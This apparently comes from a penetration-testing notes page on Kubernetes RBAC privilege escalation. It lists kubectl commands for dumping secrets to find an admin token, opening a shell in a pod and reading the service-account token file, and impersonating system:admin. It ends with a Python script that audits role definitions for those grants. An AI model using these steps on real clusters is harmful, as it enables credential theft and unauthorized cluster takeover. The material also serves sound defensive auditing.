
# Privilege Escalation

**RBAC - Listing Secrets**

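If a user has a role attached that allows them to list secrets, it can be abused to escalate privileges. When all the secrets stored in the cluster are listed, one of them will be the admin token, which allows an attacker to gain the highest privileges in the cluster.

```
kubectl get secrets   # note the NAME
kubectl describe secrets "NAME"
```

**RBAC - Pod Exec**

If your user has the "create" permission on the "pods/exec" resource, shell commands can be executed on a running pod.

Connect to the pod:

```
kubectl exec --stdin --tty NAME_OF_POD -- /bin/bash
```

View the token:

```
cat /var/run/secrets/kubernetes.io/serviceaccount/token
```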

**RBAC - Impersonation**

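If a user has the ability to impersonate users or groups, this can be leveraged to escalate privileges.

```
kubectl get secret --as=system:admin
```

As the command above shows, the `--as` flag specifies the user the command is executed as.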
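From the defender's side, the three grants described on this page can be found by auditing role rules. The following is an added example, not part of the original page: it scans JSON in the shape of `kubectl get clusterroles,roles -A -o json` for those grants; the function names are hypothetical and the sample roles are constructed.

```python
import json
import sys

# Resource -> verbs that the sections above describe as escalation paths.
RISKY = {
    "secrets": {"list", "get"},   # read tokens stored as secrets
    "pods/exec": {"create"},      # run a shell inside a running pod
    "users": {"impersonate"},     # kubectl --as=<user>
    "groups": {"impersonate"},    # kubectl --as-group=<group>
}

def resource_matches(rule_res, wanted):
    """Mirror RBAC matching: exact name, '*', or '*/<subresource>'."""
    if rule_res in ("*", wanted):
        return True
    return "/" in wanted and rule_res == "*/" + wanted.split("/", 1)[1]

def risky_grants(role_list):
    """Return sorted (kind, namespace, name, resource, verb) findings."""
    findings = set()
    for item in role_list.get("items", []):
        meta = item["metadata"]
        for rule in item.get("rules") or []:
            groups = rule.get("apiGroups", [])
            if "" not in groups and "*" not in groups:
                continue  # all four resources live in the core API group
            verbs = set(rule.get("verbs", []))
            for res, bad in RISKY.items():
                if not any(resource_matches(r, res) for r in rule.get("resources", [])):
                    continue
                for verb in sorted(bad if "*" in verbs else bad & verbs):
                    findings.add((item["kind"], meta.get("namespace", ""), meta["name"], res, verb))
    return sorted(findings)

def _role(kind, ns, name, resources, verbs):
    meta = {"name": name, **({"namespace": ns} if ns else {})}
    return {"kind": kind, "metadata": meta,
            "rules": [{"apiGroups": [""], "resources": resources, "verbs": verbs}]}

# Constructed sample data; not taken from any real cluster.
SAMPLE = {"items": [
    _role("ClusterRole", "", "secret-reader", ["secrets"], ["get", "list"]),
    _role("Role", "dev", "debugger", ["pods", "pods/exec"], ["create", "get"]),
    _role("ClusterRole", "", "helpdesk", ["users", "groups"], ["impersonate"]),
    _role("Role", "dev", "viewer", ["pods"], ["get", "list"]),
    _role("Role", "ops", "exec-any", ["*/exec"], ["*"]),
]}

if __name__ == "__main__":
    data = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE
    for finding in risky_grants(data):
        print(*finding, sep="\t")
```

Rules that set `resourceNames` are still reported, so review those findings against the names they are restricted to.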
